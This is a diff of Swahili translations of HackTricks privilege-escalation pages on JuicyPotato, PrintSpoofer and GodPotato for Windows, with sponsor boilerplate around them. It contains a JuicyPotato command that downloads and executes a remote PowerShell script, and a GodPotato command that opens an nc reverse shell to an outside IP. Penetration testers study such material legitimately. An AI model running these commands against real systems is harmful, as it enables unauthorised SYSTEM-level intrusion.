* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -4,7 +4,7 @@
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikitangazwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -12,13 +12,13 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -42,19 +42,19 @@ _To leo tamu la_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotato
### Muhtasari <a href="#summary" id="summary"></a>
[Kutoka kwa SomaMe ya juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[**Kutoka kwa Soma juicypotato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) na [toleo lake](https://github.com/decoder-it/lonelypotato) linatumia mnyororo wa kupandisha mamlaka kulingana na [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [huduma](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) ikiwa na msikilizaji wa MiTM kwenye `127.0.0.1:6666` na unapokuwa na mamlaka ya `SeImpersonate` au `SeAssignPrimaryToken`. Wakati wa ukaguzi wa ujenzi wa Windows tuligundua usanidi ambapo `BITS` ulizuiliwa kwa makusudi na bandari `6666` ilichukuliwa.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) na [toleo lake](https://github.com/decoder-it/lonelypotato) linatumia mnyororo wa kupandisha mamlaka kulingana na [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [huduma](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) ikiwa na msikilizaji wa MiTM kwenye `127.0.0.1:6666` na unapokuwa na mamlaka ya `SeImpersonate` au `SeAssignPrimaryToken`. Wakati wa ukaguzi wa ujenzi wa Windows tuligundua usanidi ambapo `BITS` ulizimwa kwa makusudi na bandari `6666` ilichukuliwa.
Tuliamua kuwezesha [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Sema habari njema kwa Juicy Potato**.
Tuliamua kuwezesha [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Sema habari kwa Juicy Potato**.
> Kwa nadharia, angalia [Rotten Potato - Kupandisha Mamlaka kutoka kwa Akaunti za Huduma hadi SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) na fuata mnyororo wa viungo na marejeo.
Tuligundua kwamba, zaidi ya `BITS` kuna seva kadhaa za COM tunaweza kutumia vibaya. Wanahitaji tu:
Tuligundua kwamba, mbali na `BITS` kuna seva za COM kadhaa tunaweza kutumia vibaya. Wanahitaji tu:
1. iweze kuanzishwa na mtumiaji wa sasa, kawaida "mtumiaji wa huduma" ambaye ana mamlaka ya udanganyifu
2. tekeleza kiolesura cha `IMarshal`
3. kufanya kazi kama mtumiaji aliyeinuliwa (SYSTEM, Msimamizi, …)
3. iweze kukimbia kama mtumiaji aliyeinuliwa (SYSTEM, Msimamizi, …)
Baada ya majaribio tulipata na kujaribu orodha ndefu ya [CLSID's za kuvutia](http://ohpe.it/juicy-potato/CLSID/) kwenye toleo kadhaa za Windows.
@ -99,7 +99,7 @@ Ikiwa mtumiaji ana ruhusa za `SeImpersonate` au `SeAssignPrimaryToken` basi wewe
Ni karibu haiwezekani kuzuia matumizi mabaya ya seva zote hizi za COM. Unaweza kufikiria kuhusu kubadilisha ruhusa za vitu hivi kupitia `DCOMCNFG` lakini kila la heri, hii itakuwa changamoto.
Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendeshwa chini ya akaunti za `* SERVICE`. Kusitisha `DCOM` bila shaka kungezuia shambulio hili lakini kunaweza kuwa na athari kubwa kwa OS inayohusika.
Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendeshwa chini ya akaunti za `* SERVICE`. Kusitisha `DCOM` bila shaka itazuia shambulio hili lakini inaweza kuwa na athari kubwa kwa OS inayohusika.
Kutoka: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
@ -120,10 +120,6 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
c:\Users\Public>
```
### Powershell rev
### Powershell rev
### Powershell rev
```
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
@ -134,7 +130,7 @@ c:\Users\Public>
## Matatizo ya CLSID
Maranyingi, CLSID ya msingi ambayo JuicyPotato hutumia **haifanyi kazi** na jaribio linashindwa. Kawaida, inachukua majaribio mengi kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji fulani, unapaswa kutembelea ukurasa huu:
Maranyingi, CLSID ya msingi ambayo JuicyPotato hutumia **haifanyi kazi** na shambulio linashindwa. Kawaida, inachukua majaribio mengi kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji fulani, unapaswa kutembelea ukurasa huu:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
@ -142,7 +138,7 @@ Maranyingi, CLSID ya msingi ambayo JuicyPotato hutumia **haifanyi kazi** na jari
Kwanza, utahitaji baadhi ya programu za kutekeleza mbali na juicypotato.exe.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na upakie kwenye kikao chako cha PS, na pakua na tekeleza [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSIDs inayoweza kujaribiwa.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na upakie kwenye kikao chako cha PS, na pakua na tekeleza [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSIDs inayowezekana kujaribu.
Kisha pakua [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(badilisha njia ya orodha ya CLSID na kwa kutekelezeka kwa juicypotato) na tekeleza. Itaanza kujaribu kila CLSID, na **wakati nambari ya bandari inabadilika, itamaanisha kwamba CLSID imefanya kazi**.
@ -152,26 +148,26 @@ Kisha pakua [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwenye:
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika kampuni ya **usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika kampuni ya **usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -14,13 +14,13 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -29,7 +29,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
---
{% hint style="warning" %}
**JuicyPotato haitumiki** kwenye Windows Server 2019 na Windows 10 toleo la 1809 na baadaye. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) inaweza kutumika kwa **kutumia haki sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`**. Chapisho hili la blogu linachunguza kwa undani zana ya `PrintSpoofer`, ambayo inaweza kutumika kudhuru haki za uigaji kwenye mwenyeji wa Windows 10 na Server 2019 ambapo JuicyPotato haifanyi kazi tena.
**JuicyPotato haitumiki** kwenye Windows Server 2019 na Windows 10 toleo la 1809 na baadaye. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) inaweza kutumika kwa **kutumia mamlaka sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`**. Chapisho hili la blogu linachunguza kwa undani zana ya `PrintSpoofer`, ambayo inaweza kutumika kudhuru mamlaka ya uigizaji kwenye mwenyeji wa Windows 10 na Server 2019 ambapo JuicyPotato haifanyi kazi tena.
{% endhint %}
## Onyesho Haraka
@ -80,7 +80,7 @@ nt authority\system
```
### GodPotato
GodPotato ni mchanganyiko wa RoguePotato na PrintSpoofer. Inatumia PrintSpoofer kuchapisha kwa printer ya uongo na kisha kutumia RoguePotato kutekeleza amri ya mfumo kwa kutumia uchapishaji wa printer ya uongo. Hii inaweza kusababisha kupanda kwa mamlaka kwenye mfumo.
### GodPotato
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
@ -92,13 +92,13 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malwares za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: